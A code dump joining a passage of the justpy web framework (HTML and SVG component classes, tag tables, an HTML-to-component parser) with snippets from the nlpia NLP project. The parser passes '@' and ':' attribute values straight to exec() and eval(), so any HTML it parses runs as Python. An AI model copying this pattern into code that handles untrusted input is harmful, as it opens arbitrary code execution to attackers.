Defaults to "start". self.inline_option = 'nearest' # One of "start", "center", "end", or "nearest". Defaults to "nearest". 
super().__init__(**kwargs) if not kwargs.get('click'): def default_click(self, msg): return True self.on('click', default_click) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['scroll'] = self.scroll d['scroll_option'] = self.scroll_option d['block_option'] = self.block_option d['inline_option'] = self.inline_option if self.bookmark is not None: self.href = '#' + str(self.bookmark.id) self.scroll_to = str(self.bookmark.id) if d['scroll']: d['scroll_to'] = self.scroll_to d['attrs']['href'] = self.href d['attrs']['target'] = self.target if self.download is not None: d['attrs']['download'] = self.download return d Link = A # The 'Link' name is more descriptive and can be used instead class Icon(Div): def __init__(self, **kwargs): self.icon = 'dog' # Default icon super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['classes'] = self.classes + ' fa fa-' + self.icon return d class EditorMD(Textarea): # https://www.cssportal.com/style-input-range/ style an input range # Set the page's tailwind attribute to False for preview to work def __init__(self, **kwargs): super().__init__(**kwargs) self.debounce = 0 self.input_type = 'textarea' self.vue_type = 'editorjp' self.html_tag = 'textarea' class Space(Div): # Creates a span with hard spaces. def __init__(self, **kwargs): super().__init__(**kwargs) self.num = kwargs.get('num', 1) self.html_tag = 'span' self.inner_html = '&nbsp;' * self.num # Non html components class TabGroup(Div): """ Displays a tab based on its value. Has a dict of tabs whose keys is the value. A tab is any JustPy component. format of dict: {'value1': {'tab': comp1, 'order': number}, 'value2': {'tab': comp2, 'order': number} ...} self.tabs - tab dict self.animation_next = 'slideInRight' set animation for tab coming in self.animation_prev = 'slideOutLeft' set animation for tab going out self.animation_speed = 'faster' can be on of '' | 'slow' | 'slower' | 'fast' | 'faster' self.value value of group and tab to display self.previous - previous tab, no need to change except to set to '' in order to display tab without animation which is default at first """ wrapper_classes = ' ' wrapper_style = 'display: flex; position: absolute; width: 100%; height: 100%; align-items: center; justify-content: center; background-color: #fff;' def __init__(self, **kwargs): self.tabs = {} # Dict with format 'value': {'tab': Div component, 'order': number} for each entry self.value = '' self.previous_value = '' # https://github.com/daneden/animate.css self.animation_next = 'slideInRight' self.animation_prev = 'slideOutLeft' self.animation_speed = 'faster' # '' | 'slow' | 'slower' | 'fast' | 'faster' super().__init__(**kwargs) def __setattr__(self, key, value): if key == 'value': try: self.previous_value = self.value except: pass self.__dict__[key] = value def model_update(self): self.value = self.model[0].data[self.model[1]] def convert_object_to_dict(self): self.components = [] self.wrapper_div_classes = self.animation_speed # Component in this will be centered if self.previous_value: self.wrapper_div = Div(classes=self.wrapper_div_classes, animation=self.animation_next, temp=True, style=f'{self.__class__.wrapper_style} z-index: 50;', a=self) self.wrapper_div.add(self.tabs[self.value]['tab']) self.wrapper_div = Div(classes=self.wrapper_div_classes, animation=self.animation_prev, temp=True, style=f'{self.__class__.wrapper_style} z-index: 0;', a=self) self.wrapper_div.add(self.tabs[self.previous_value]['tab']) else: self.wrapper_div = 
Div(classes=self.wrapper_div_classes, temp=True, a=self, style=self.__class__.wrapper_style) self.wrapper_div.add(self.tabs[self.value]['tab']) self.style = ' position: relative; overflow: hidden; ' + self.style # overflow: hidden; d = super().convert_object_to_dict() return d # HTML tags for which corresponding classes will be created _tag_create_list = ['address', 'article', 'aside', 'footer', 'header', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'main', 'nav', 'section', 'blockquote', 'dd', 'dl', 'dt', 'figcaption', 'figure', 'hr', 'li', 'ol', 'p', 'pre', 'ul', 'abbr', 'b', 'bdi', 'bdo', 'br', 'cite', 'code', 'data', 'dfn', 'em', 'i', 'kbd', 'mark', 'q', 'rb', 'rp', 'rt', 'rtc', 'ruby', 's', 'samp', 'small', 'span', 'strong', 'sub', 'sup', 'time', 'tt', 'u', 'var', 'wbr', 'area', 'audio', 'img', 'map', 'track', 'video', 'embed', 'iframe', 'object', 'param', 'picture', 'source', 'del', 'ins', 'title', 'caption', 'col', 'colgroup', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead', 'tr', 'button', 'fieldset', 'legend', 'meter', 'optgroup', 'option', 'progress', # datalist not supported 'details', 'summary', 'style' # dialog not supported ] # Only tags that have non-gloabal attributes that are supported by HTML 5 are in this dict _attr_dict = {'a': ['download', 'href', 'hreflang', 'media', 'ping', 'rel', 'target', 'type'], 'area': ['alt', 'coords', 'download', 'href', 'hreflang', 'media', 'rel', 'shape', 'target', 'type'], 'audio': ['autoplay', 'controls', 'loop', 'muted', 'preload', 'src'], 'base': ['href', 'target'], 'bdo': ['dir'], 'blockquote': ['cite'], 'button': ['autofocus', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'name', 'type', 'value'], 'canvas': ['height', 'width'], 'col': ['span'], 'colgroup': ['span'], 'data': ['value'], 'del': ['cite', 'datetime'], 'details': ['open'], 'dialog': ['open'], 'embed': ['height', 'src', 'type', 'width'], 'fieldset': ['disabled', 'form', 'name'], 'form': ['accept-charset', 'action', 'autocomplete', 'enctype', 'method', 'name', 'novalidate', 'target'], 'html': ['xmlns'], 'iframe': ['height', 'name', 'sandbox', 'src', 'srcdoc', 'width'], 'img': ['alt', 'crossorigin', 'height', 'ismap', 'longdesc', 'sizes', 'src', 'srcset', 'usemap', 'width'], 'input': ['accept', 'alt', 'autocomplete', 'autofocus', 'checked', 'dirname', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'height', 'list', 'max', 'maxlength', 'min', 'minlength', 'multiple', 'name', 'pattern', 'placeholder', 'readonly', 'required', 'size', 'src', 'step', 'type', 'value', 'width'], 'ins': ['cite', 'datetime'], 'label': ['for', 'form'], 'li': ['value'], 'link': ['crossorigin', 'href', 'hreflang', 'media', 'rel', 'sizes', 'type'], 'map': ['name'], 'meta': ['charset', 'content', 'http-equiv', 'name'], 'meter': ['form', 'high', 'low', 'max', 'min', 'optimum', 'value'], 'object': ['data', 'form', 'height', 'name', 'type', 'usemap', 'width'], 'ol': ['reversed', 'start', 'type'], 'optgroup': ['disabled', 'label'], 'option': ['disabled', 'label', 'selected', 'value'], 'output': ['for', 'form', 'name'], 'param': ['name', 'value'], 'progress': ['max', 'value'], 'q': ['cite'], 'script': ['async', 'charset', 'defer', 'src', 'type'], 'select': ['autofocus', 'disabled', 'form', 'multiple', 'name', 'required', 'size'], 'source': ['src', 'srcset', 'media', 'sizes', 'type'], 'style': ['media', 'type'], 'td': ['colspan', 'headers', 'rowspan'], 'textarea': ['autofocus', 'cols', 'dirname', 'disabled', 'form', 'maxlength', 
'name', 'placeholder', 'readonly', 'required', 'rows', 'wrap'], 'th': ['abbr', 'colspan', 'headers', 'rowspan', 'scope', 'sorted'], 'time': ['datetime'], 'track': ['default', 'kind', 'label', 'src', 'srclang'], 'video': ['autoplay', 'controls', 'height', 'loop', 'muted', 'poster', 'preload', 'src', 'width']} # Name definition for static syntax analysers # Classes are defined dynamically right after, this is just to assist code editors Address = Article = Aside = Footer = Header = H1 = H2 = H3 = H4 = H5 = H6 = Main = Nav = Section = Blockquote = Dd = Dl = Dt = Figcaption = Figure = Hr = Li = Ol = P = Pre = Ul = Abbr = B = Bdi = Bdo = Br = Cite = Code = Data = Dfn = Em = I = Kbd = Mark = Q = Rb = Rp = Rt = Rtc = Ruby = S = Samp = Small = Span = Strong = Sub = Sup = Time = Tt = U = Var = Wbr = Area = Audio = Img = Map = Track = Video = Embed = Iframe = Object = Param = Picture = Source = Del = Ins = Caption = Col = Colgroup = Table = Tbody = Td = Tfoot = Th = Thead = Tr = Button = Fieldset = Legend = Meter = Optgroup = Option = Progress = Details = Summary = None Animate = AnimateMotion = AnimateTransform = Circle = ClipPath = Defs = Desc = Discard = Ellipse = FeBlend = FeColorMatrix = FeComponentTransfer = FeComposite = FeConvolveMatrix = FeDiffuseLighting = FeDisplacementMap = FeDistantLight = FeDropShadow = FeFlood = FeFuncA = FeFuncB = FeFuncG = FeFuncR = FeGaussianBlur = FeImage = FeMerge = FeMergeNode = FeMorphology = FeOffset = FePointLight = FeSpecularLighting = FeSpotLight = FeTile = FeTurbulence = Filter = ForeignObject = G = Image = Line = LinearGradient = Marker = Mask = Metadata = Mpath = Path = Pattern = Polygon = Polyline = RadialGradient = Rect = Set = Stop = Svg = Switch = Symbol = Text = TextPath = Tspan = Use = View = None # Tag classes defined dynamically at runtime for tag in _tag_create_list: globals()[tag.capitalize()] = type(tag.capitalize(), (Div,), {'html_tag': tag, 'attributes': _attr_dict.get(tag, [])}) # ********************************** # SVG components # https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute # in, in2, mode svg_tags = ['a', 'animate', 'animateMotion', 'animateTransform', 'audio', 'canvas', 'circle', 'clipPath', 'defs', 'desc', 'discard', 'ellipse', 'feBlend', 'feColorMatrix', 'feComponentTransfer', 'feComposite', 'feConvolveMatrix', 'feDiffuseLighting', 'feDisplacementMap', 'feDistantLight', 'feDropShadow', 'feFlood', 'feFuncA', 'feFuncB', 'feFuncG', 'feFuncR', 'feGaussianBlur', 'feImage', 'feMerge', 'feMergeNode', 'feMorphology', 'feOffset', 'fePointLight', 'feSpecularLighting', 'feSpotLight', 'feTile', 'feTurbulence', 'filter', 'foreignObject', 'g', 'iframe', 'image', 'line', 'linearGradient', 'marker', 'mask', 'metadata', 'mpath', 'path', 'pattern', 'polygon', 'polyline', 'radialGradient', 'rect', 'script', 'set', 'stop', 'style', 'svg', 'switch', 'symbol', 'text', 'textPath', 'title', 'tspan', 'unknown', 'use', 'video', 'view'] svg_tags_use = ['animate', 'animateMotion', 'animateTransform', 'circle', 'clipPath', 'defs', 'desc', 'discard', 'ellipse', 'feBlend', 'feColorMatrix', 'feComponentTransfer', 'feComposite', 'feConvolveMatrix', 'feDiffuseLighting', 'feDisplacementMap', 'feDistantLight', 'feDropShadow', 'feFlood', 'feFuncA', 'feFuncB', 'feFuncG', 'feFuncR', 'feGaussianBlur', 'feImage', 'feMerge', 'feMergeNode', 'feMorphology', 'feOffset', 'fePointLight', 'feSpecularLighting', 'feSpotLight', 'feTile', 'feTurbulence', 'filter', 'foreignObject', 'g', 'image', 'line', 'linearGradient', 'marker', 'mask', 'metadata', 'mpath', 'path', 
'pattern', 'polygon', 'polyline', 'radialGradient', 'rect', 'set', 'stop', 'svg', 'switch', 'symbol', 'text', 'textPath', 'tspan', 'use', 'view'] svg_presentation_attributes = ['alignment-baseline', 'baseline-shift', 'clip', 'clip-path', 'clip-rule', 'color', 'color-interpolation', 'color-interpolation-filters', 'color-profile', 'color-rendering', 'cursor', 'direction', 'display', 'dominant-baseline', 'enable-background', 'fill', 'fill-opacity', 'fill-rule', 'filter', 'flood-color', 'flood-opacity', 'font-family', 'font-size', 'font-size-adjust', 'font-stretch', 'font-style', 'font-variant', 'font-weight', 'glyph-orientation-horizontal', 'glyph-orientation-vertical', 'image-rendering', 'kerning', 'letter-spacing', 'lighting-color', 'marker-end', 'marker-mid', 'marker-start', 'mask', 'opacity', 'overflow', 'pointer-events', 'shape-rendering', 'stop-color', 'stop-opacity', 'stroke', 'stroke-dasharray', 'stroke-dashoffset', 'stroke-linecap', 'stroke-linejoin', 'stroke-miterlimit', 'stroke-opacity', 'stroke-width', 'text-anchor', 'transform', 'text-decoration', 'text-rendering', 'unicode-bidi', 'vector-effect', 'visibility', 'word-spacing', 'writing-mode', 'cx', 'cy', 'r', 'rx', 'ry', 'd', 'fill', 'transform'] svg_filter_attributes = ['height', 'result', 'width', 'x', 'y', 'type', 'tableValues', 'slope', 'intercept', 'amplitude', 'exponent', 'offset', 'xlink:href'] svg_animation_attributes = ['attributeType', 'attributeName', 'begin', 'dur', 'end', 'min', 'max', 'restart', 'repeatCount', 'repeatDur', 'fill', 'calcMode', 'values', 'keyTimes', 'keySplines', 'from', 'to', 'by', 'additive', 'accumulate'] svg_attr_dict = {'a': ['download', 'requiredExtensions', 'role', 'systemLanguage'], 'animate': ['accumulate', 'additive', 'attributeName', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keySplines', 'keyTimes', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to', 'values'], 'animateMotion': ['accumulate', 'additive', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keyPoints', 'keySplines', 'keyTimes', 'max', 'min', 'origin', 'path', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'rotate', 'systemLanguage', 'to', 'values'], 'animateTransform': ['accumulate', 'additive', 'attributeName', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keySplines', 'keyTimes', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to', 'type', 'values'], 'audio': ['requiredExtensions', 'role', 'systemLanguage'], 'canvas': ['preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage'], 'circle': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'clipPath': ['clipPathUnits', 'requiredExtensions', 'systemLanguage'], 'discard': ['begin', 'href', 'requiredExtensions', 'role', 'systemLanguage'], 'ellipse': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'feBlend': ['height', 'in', 'in2', 'mode', 'result', 'width', 'x', 'y'], 'feColorMatrix': ['height', 'in', 'result', 'type', 'values', 'width', 'x', 'y'], 'feComponentTransfer': ['height', 'in', 'result', 'width', 'x', 'y'], 'feComposite': ['height', 'in', 'in2', 'k1', 'k2', 'k3', 'k4', 'operator', 'result', 'width', 'x', 'y'], 'feConvolveMatrix': ['bias', 'divisor', 'edgeMode', 'height', 'in', 'kernelMatrix', 'kernelUnitLength', 'order', 'preserveAlpha', 'result', 'targetX', 'targetY', 'width', 'x', 'y'], 'feDiffuseLighting': ['diffuseConstant', 'height', 'in', 'kernelUnitLength', 
'result', 'surfaceScale', 'width', 'x', 'y'], 'feDisplacementMap': ['height', 'in', 'in2', 'result', 'scale', 'width', 'x', 'xChannelSelector', 'y', 'yChannelSelector'], 'feDistantLight': ['azimuth', 'elevation'], 'feDropShadow': ['dx', 'dy', 'height', 'in', 'result', 'stdDeviation', 'width', 'x', 'y'], 'feFlood': ['height', 'result', 'width', 'x', 'y'], 'feFuncA': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncB': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncG': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncR': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feGaussianBlur': ['edgeMode', 'height', 'in', 'result', 'stdDeviation', 'width', 'x', 'y'], 'feImage': ['crossorigin', 'height', 'href', 'preserveAspectRatio', 'result', 'width', 'x', 'y'], 'feMerge': ['height', 'result', 'width', 'x', 'y'], 'feMergeNode': ['in'], 'feMorphology': ['height', 'in', 'operator', 'radius', 'result', 'width', 'x', 'y'], 'feOffset': ['dx', 'dy', 'height', 'in', 'result', 'width', 'x', 'y'], 'fePointLight': ['x', 'y', 'z'], 'feSpecularLighting': ['height', 'in', 'kernelUnitLength', 'result', 'specularConstant', 'specularExponent', 'surfaceScale', 'width', 'x', 'y'], 'feSpotLight': ['limitingConeAngle', 'pointsAtX', 'pointsAtY', 'pointsAtZ', 'specularExponent', 'x', 'y', 'z'], 'feTile': ['height', 'in', 'result', 'width', 'x', 'y'], 'feTurbulence': ['baseFrequency', 'height', 'numOctaves', 'result', 'seed', 'stitchTiles', 'type', 'width', 'x', 'y'], 'filter': ['filterUnits', 'height', 'primitiveUnits', 'width', 'x', 'y'], 'foreignObject': ['requiredExtensions', 'role', 'systemLanguage'], 'g': ['requiredExtensions', 'role', 'systemLanguage'], 'iframe': ['requiredExtensions', 'role', 'systemLanguage'], 'image': ['crossorigin', 'href', 'preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage'], 'line': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage', 'x1', 'x2', 'y1', 'y2'], 'linearGradient': ['gradientTransform', 'gradientUnits', 'href', 'spreadMethod', 'x1', 'x2', 'y1', 'y2'], 'marker': ['markerHeight', 'markerUnits', 'markerWidth', 'orient', 'preserveAspectRatio', 'refX', 'refY', 'viewBox'], 'mask': ['height', 'maskContentUnits', 'maskUnits', 'requiredExtensions', 'systemLanguage', 'width', 'x', 'y'], 'mpath': ['href'], 'path': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'pattern': ['height', 'href', 'patternContentUnits', 'patternTransform', 'patternUnits', 'preserveAspectRatio', 'viewBox', 'width', 'x', 'y'], 'polygon': ['pathLength', 'points', 'requiredExtensions', 'role', 'systemLanguage'], 'polyline': ['pathLength', 'points', 'requiredExtensions', 'role', 'systemLanguage'], 'radialGradient': ['cx', 'cy', 'fr', 'fx', 'fy', 'gradientTransform', 'gradientUnits', 'href', 'r', 'spreadMethod'], 'rect': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'script': ['href'], 'set': ['attributeName', 'begin', 'dur', 'end', 'fill', 'href', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to'], 'stop': ['offset'], 'style': ['media'], 'svg': ['playbackorder', 'preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage', 'timelinebegin', 'transform', 'viewBox', 'zoomAndPan', 'xmlns', 'version'], 'switch': ['requiredExtensions', 'role', 'systemLanguage'], 'symbol': ['preserveAspectRatio', 'refX', 'refY', 'role', 'viewBox'], 'text': ['dx', 'dy', 
'lengthAdjust', 'requiredExtensions', 'role', 'rotate', 'systemLanguage', 'textLength', 'x', 'y'], 'textPath': ['href', 'lengthAdjust', 'method', 'path', 'requiredExtensions', 'role', 'side', 'spacing', 'startOffset', 'systemLanguage', 'textLength'], 'tspan': ['dx', 'dy', 'lengthAdjust', 'requiredExtensions', 'role', 'rotate', 'systemLanguage', 'textLength', 'x', 'y'], 'unknown': ['requiredExtensions', 'role', 'systemLanguage'], 'use': ['href', 'requiredExtensions', 'role', 'systemLanguage'], 'video': ['requiredExtensions', 'role', 'systemLanguage'], 'view': ['preserveAspectRatio', 'role', 'viewBox', 'zoomAndPan']} for tag in svg_tags_use: c_tag = tag[0].capitalize() + tag[1:] globals()[c_tag] = type(c_tag, (Div,), {'html_tag': tag, 'attributes': svg_attr_dict.get(tag, []) + svg_presentation_attributes + svg_filter_attributes}) # *************************** end SVG components class HTMLEntity(Span): # Render HTML Entities def __init__(self, **kwargs): self.entity = '' super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['inner_html'] = self.entity return d class Hello(Div): def __init__(self, **kwargs): self.counter = 1 super().__init__(**kwargs) self.classes = 'm-1 p-1 text-2xl text-center text-white bg-blue-500 hover:bg-blue-800 cursor-pointer' self.text = 'Hello! (click me)' async def click(self, msg): self.text = f'Hello! I was clicked {self.counter} times' self.counter += 1 self.on('click', click) class QHello(Hello): def __init__(self, **kwargs): super().__init__(**kwargs) self.classes = 'text-h3 text-primary q-ma-md' def component_by_tag(tag, **kwargs): # tag = tag.lower() if tag[0:2] == 'q-': if tag in _tag_class_dict: c = _tag_class_dict[tag](**kwargs) else: raise ValueError(f'Tag not defined: {tag}') else: tag_class_name = tag[0].capitalize() + tag[1:] try: c = globals()[tag_class_name](**kwargs) except: raise ValueError(f'Tag not defined: {tag}') return c class AutoTable(Table): """ Creates an HTML table from a list of lists First list is used as headers """ td_classes = 'border px-4 py-2 text-center' tr_even_classes = 'bg-gray-100 ' tr_odd_classes = '' th_classes = 'px-4 py-2' def __init__(self, **kwargs): self.values = [] super().__init__(**kwargs) def react(self, data): self.set_class('table-auto') # First row of values is header if self.values: headers = self.values[0] thead = Thead(a=self) tr = Tr(a=thead) for item in headers: Th(text=item, classes=self.th_classes, a=tr) tbody = Tbody(a=self) for i, row in enumerate(self.values[1:]): if i % 2 == 1: tr = Tr(classes=self.tr_even_classes, a=tbody) else: tr = Tr(classes=self.tr_odd_classes, a=tbody) for item in row: Td(text=item, classes=self.td_classes, a=tr) get_tag = component_by_tag class BasicHTMLParser(HTMLParser): # Void elements do not need closing tag void_elements = ['area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input', 'keygen', 'link', 'menuitem', 'meta', 'param', 'source', 'track', 'wbr'] def __init__(self, context, **kwargs): super().__init__() self.context = context self.level = -1 self.parse_id = 0 self.start_tag = True self.components = [] self.name_dict = Dict() # After parsing holds a dict with named components self.dict_attribute = kwargs.get('dict_attribute', 'name') # Use another attribute than name self.root = Div(name='root') self.containers = [] self.containers.append(self.root) self.endtag_required = True self.create_commands = kwargs.get('create_commands', True) # If True, create the justpy command list self.command_prefix = 
kwargs.get('command_prefix', 'jp.') # Prefix for commands generated, defaults to 'jp.' if self.create_commands: # List of command strings (justpy python code to generate the element) self.commands = [f"root = {self.command_prefix}Div()"] else: self.commands = '' def parse_starttag(self, i): # This is the original library method with two changes to stop tags and attributes being lower case # This is required for the SVG tags which can be camelcase # https://github.com/python/cpython/blob/3.7/Lib/html/parser.py self.__starttag_text = None endpos = self.check_for_whole_start_tag(i) if endpos < 0: return endpos rawdata = self.rawdata self.__starttag_text = rawdata[i:endpos] # Now parse the data between i+1 and j into a tag and attrs attrs = [] match = tagfind_tolerant.match(rawdata, i + 1) assert match, 'unexpected call to parse_starttag()' k = match.end() # self.lasttag = tag = match.group(1).lower() was the original self.lasttag = tag = match.group(1) while k < endpos: m = attrfind_tolerant.match(rawdata, k) if not m: break attrname, rest, attrvalue = m.group(1, 2, 3) if not rest: attrvalue = None elif attrvalue[:1] == '\'' == attrvalue[-1:] or \ attrvalue[:1] == '"' == attrvalue[-1:]: attrvalue = attrvalue[1:-1] if attrvalue: attrvalue = unescape(attrvalue) # attrs.append((attrname.lower(), attrvalue)) was the original attrs.append((attrname, attrvalue)) k = m.end() end = rawdata[k:endpos].strip() if end not in (">", "/>"): lineno, offset = self.getpos() if "\n" in self.__starttag_text: lineno = lineno + self.__starttag_text.count("\n") offset = len(self.__starttag_text) \ - self.__starttag_text.rfind("\n") else: offset = offset + len(self.__starttag_text) self.handle_data(rawdata[i:endpos]) return endpos if end.endswith('/>'): # XHTML-style empty tag: <span attr="value" /> self.handle_startendtag(tag, attrs) else: self.handle_starttag(tag, attrs) if tag in self.CDATA_CONTENT_ELEMENTS: self.set_cdata_mode(tag) return endpos def handle_startendtag(self, tag, attrs): self.handle_starttag(tag, attrs) if self.endtag_required: self.handle_endtag(tag) else: self.endtag_required = True def handle_starttag(self, tag, attrs): self.level = self.level + 1 self.parse_id += 1 c = component_by_tag(tag) c.parse_id = self.parse_id command_string = f'' if c is None: print(tag, 'No such tag, Div being used instead *****************************************') c = Div() for attr in attrs: attr = list(attr) attr[0] = attr[0].replace('-', '_') if attr[0][0] == '@': if attr[1] in self.context.f_locals: c.on(attr[0][1:], self.context.f_locals[attr[1]]) elif attr[1] in self.context.f_globals: c.on(attr[0][1:], self.context.f_globals[attr[1]]) else: cls = JustpyBaseComponent if not c.id: c.id = cls.next_id cls.next_id += 1 fn_string = f'def oneliner{c.id}(self, msg):\n {attr[1]}' # remove first and last charcters which are quotes exec(fn_string) c.on(attr[0][1:], locals()[f'oneliner{c.id}']) continue if attr[0][0] == ':': attr[0] = attr[0][1:] attr[1] = eval(attr[1]) if attr[0] == 'id': c.id = attr[1] continue if attr[1] is None: setattr(c, attr[0], True) attr[1] = True else: setattr(c, attr[0], attr[1]) # Add to name to dict of named components. 
Each entry can be a list of components to allow multiple components with same name if attr[0] == self.dict_attribute: if attr[1] not in self.name_dict: self.name_dict[attr[1]] = c else: if not isinstance(self.name_dict[attr[1]], (list,)): self.name_dict[attr[1]] = [self.name_dict[attr[1]]] self.name_dict[attr[1]].append(c) if attr[0] == 'class': c.classes = attr[1] attr[0] = 'classes' # Handle attributes that are also python reserved words if attr[0] in ['in', 'from']: attr[0] = '_' + attr[0] if self.create_commands: if isinstance(attr[1], str): command_string = f"{command_string}{attr[0]}='{attr[1]}', " else: command_string = f'{command_string}{attr[0]}={attr[1]}, ' if self.create_commands: if id(self.containers[-1]) == id(self.root): command_string = f'c{c.parse_id} = {self.command_prefix}{c.class_name}({command_string}a=root)' else: command_string = f'c{c.parse_id} = {self.command_prefix}{c.class_name}({command_string}a=c{self.containers[-1].parse_id})' self.commands.append(command_string) self.containers[-1].add_component(c) self.containers.append(c) if tag in BasicHTMLParser.void_elements: self.handle_endtag(tag) self.endtag_required = False else: self.endtag_required = True def handle_endtag(self, tag): c = self.containers.pop() del c.parse_id self.level = self.level - 1 def handle_data(self, data): data = data.strip() if data: self.containers[-1].text = data data = data.replace("'", "\\'") if self.create_commands: self.commands[-1] = f"{self.commands[-1][:-1]}, text='{data}')" return def handle_comment(self, data): pass def handle_entityref(self, name): c = chr(name2codepoint[name]) def handle_charref(self, name): if name.startswith('x'): c = chr(int(name[1:], 16)) else: c = chr(int(name)) def handle_decl(self, data): pass def justPY_parser(html_string, context, **kwargs): ''' Returns root component of the parser with the name_dict as attribute. 
If root component has only one child, returns the child ''' parser = BasicHTMLParser(context, **kwargs) parser.feed(html_string) if len(parser.root.components) == 1: parser_result = parser.root.components[0] else: parser_result = parser.root parser_result.name_dict = parser.name_dict parser_result.commands = parser.commands parser_result.initialize(**kwargs) return parser_result def parse_html(html_string, **kwargs): return justPY_parser(html_string, inspect.stack()[1][0], **kwargs) def parse_html_file(html_file, **kwargs): with open(html_file, encoding="utf-8") as f: return justPY_parser(f.read(), inspect.stack()[1][0], **kwargs) try: import aiofiles _has_aiofiles = True except: _has_aiofiles = False if _has_aiofiles: async def parse_html_file_async(html_file, **kwargs): async with aiofiles.open(html_file, encoding="utf-8") as f: s = await f.read() return justPY_parser(s, **kwargs) else: async def parse_html_file_async(html_file, **kwargs): raise Exception('aiofiles not installed') async def get(url, format='json'): async with httpx.AsyncClient() as client: result = await client.get(url) if format == 'json': return result.json() else: return result.text def get_websocket(event_data): return WebPage.sockets[event_data['page_id']][event_data['websocket_id']] def create_transition(): return Dict({'enter': '', 'enter_start': '', 'enter_end': '', 'leave': '', 'leave_start': '', 'leave_end': '', 'load': '', 'load_start': '', 'load_end': '' }) class Styles: button_simple = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded' button_pill = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded-full' button_outline = 'bg-transparent hover:bg-blue-500 text-blue-700 font-semibold hover:text-white py-2 px-4 border border-blue-500 hover:border-transparent rounded' button_bordered = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 border border-blue-700 rounded' button_disabled = 'bg-blue-500 text-white font-bold py-2 px-4 rounded opacity-50 cursor-not-allowed' button_3d = 'bg-blue-500 hover:bg-blue-400 text-white font-bold py-2 px-4 border-b-4 border-blue-700 hover:border-blue-500 rounded' button_elevated = 'bg-white hover:bg-gray-100 text-gray-800 font-semibold py-2 px-4 border border-gray-400 rounded shadow' input_classes = "m-2 bg-gray-200 border-2 border-gray-200 rounded w-64 py-2 px-4 text-gray-700 focus:outline-none focus:bg-white focus:border-purple-500" # https://www.lipsum.com / lorem_ipsum = """ Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. """ ```
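
# ---------------------------------------------------------------------------
# Usage sketch (editor's addition, not part of the original justpy source):
# a minimal example of the HTML-parsing helpers defined above. parse_html()
# returns the root component (or its only child) carrying a `name_dict` of
# components keyed by their `name` attribute and, when create_commands=True,
# a `commands` list of generated justpy construction code. The HTML snippet
# and variable names below are illustrative assumptions.
if __name__ == '__main__':
    root = parse_html('<div><p name="greeting" class="text-xl">Hello</p></div>')
    greeting = root.name_dict['greeting']   # the <p> component whose name attribute is "greeting"
    print(greeting.text)                    # -> 'Hello'
    print(root.commands)                    # generated justpy commands for rebuilding this tree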
{ "source": "AAAI-DISIM-UnivAQ/nlpia", "score": 3 }
#### File: book/examples/ch06_glove_nessvectors.py
```python
import numpy as np


def load_glove(filepath):
    """Load GloVe vectors from a whitespace-delimited text file into a dict of {word: vector}."""
    # print("Loading Glove Model")
    f = open(filepath, 'r')
    wv = {}
    for line in f:
        splitLines = line.split()
        word = splitLines[0]
        embedding = np.array([float(value) for value in splitLines[1:]])
        wv[word] = embedding
    # print(len(wv), " words loaded!")
    return wv
```
#### File: src/nlpia/loaders.py
```python
from __future__ import print_function, unicode_literals, division, absolute_import
from builtins import (bytes, dict, int, list, object, range, str,  # noqa
                      ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)
from future import standard_library
standard_library.install_aliases()  # noqa
from past.builtins import basestring
# from traceback import format_exc

import os
import re
import json
import logging
import shutil
from traceback import format_exc
from zipfile import ZipFile
from math import ceil
from itertools import product, zip_longest

from requests.exceptions import ConnectionError, InvalidURL, InvalidSchema, InvalidHeader, MissingSchema
from urllib.error import URLError
from copy import deepcopy

import pandas as pd
import tarfile
import ftplib
import spacy
from gensim.models import KeyedVectors
from gensim.models.keyedvectors import REAL, Vocab
from gensim.scripts.glove2word2vec import glove2word2vec
from pugnlp.util import clean_columns

from nlpia.constants import DATA_PATH, BIGDATA_PATH
from nlpia.constants import DATA_INFO_FILE, BIGDATA_INFO_FILE, BIGDATA_INFO_LATEST
from nlpia.constants import INT_MIN, INT_NAN, MIN_DATA_FILE_SIZE
from nlpia.constants import EOL  # noqa (not used)
